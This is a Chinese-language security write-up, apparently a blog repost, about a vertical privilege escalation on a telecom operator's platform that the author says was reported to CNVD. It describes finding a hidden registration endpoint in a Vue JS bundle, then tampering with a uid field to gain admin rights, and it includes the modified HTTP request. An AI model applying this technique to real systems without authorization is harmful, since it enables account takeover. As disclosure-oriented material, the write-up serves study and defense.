某运营商平台存在垂直越权
该漏洞已提交cnvd 并修复。 做脱敏处理 漏洞url:xxx.xxx..xx
尝试一下弱口令
image-20230329213121335
无果,发现网站有vue框架,检查一下js
image-20230329213141853
皇天不负有心人,在/app.bf2b1749.js里面找到了一个可疑接口,尝试拼接访问
image-20230329213212130
发现是注册功能,填写信息进行注册。发现能收到验证码,填写并且注册。
image-20230329213239451
注册成功
image-20230329213258789
尝试登录成功进入后台
image-20230329213317678
此处功能没什么用处,打开右上角个人信息的时候,点击刷新,抓包发现一个可疑请求(换火狐抓包)
image-20230329213355340
出来第一个包先放掉
image-20230329213426229
第二个也放掉
image-20230329213449759
第三个包时,发现会自动请求刷新,并且出现了uid
image-20230329213519665
发到repeater里面,修改uid为admin,发现返回系统管理员, 此处可以通过修改uid 达到用户遍历的效果。 http请求包如下:
POST /prod-api/wuyu/user/get_user_info HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json, text/plain, *****/*****
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Access_token: hN0AF2XX6**+**qZSAmuoOfwQHh76g8vgqovXx8b065nHsw=
Authtoken: a6d71d0278894b9aafd5b45675879a2f
Content-Length: 15
Origin: [https://x](https://4xxxx8010)
Referer: [https:/x/profile/index](https://xxxxx/profile/index)
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: max-age=0
Te: trailers
Connection: close
{"uid":"admin"}
image-20230329213550321
此时将抓包的数据改为admin,放包。
image-20230329213614590
此时发现左边选项多了几个操作,垂直越权成功,成功有了管理员权限。
image-20230329213643649
点击用户管理,可以查看和管理已注册的用户
image-20230329213724288
还可以进行一系列敏感操作,比如添加有操作权限的用户,等等。
image-20230329213752303
发现版本管理处有一个apk下载文件,下载后在手机打开 下载地址: http://xx.xx.xx.xx/wuyu/user/release/6/1.0.99/xcgj-1.0.99.apk
后续过程就不方便展示了
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
相关产品与服务
验证码
腾讯云新一代行为验证码(Captcha),基于十道安全栅栏, 为网页、App、小程序开发者打造立体、全面的人机验证。最大程度保护注册登录、活动秒杀、点赞发帖、数据保护等各大场景下业务安全的同时,提供更精细化的用户体验。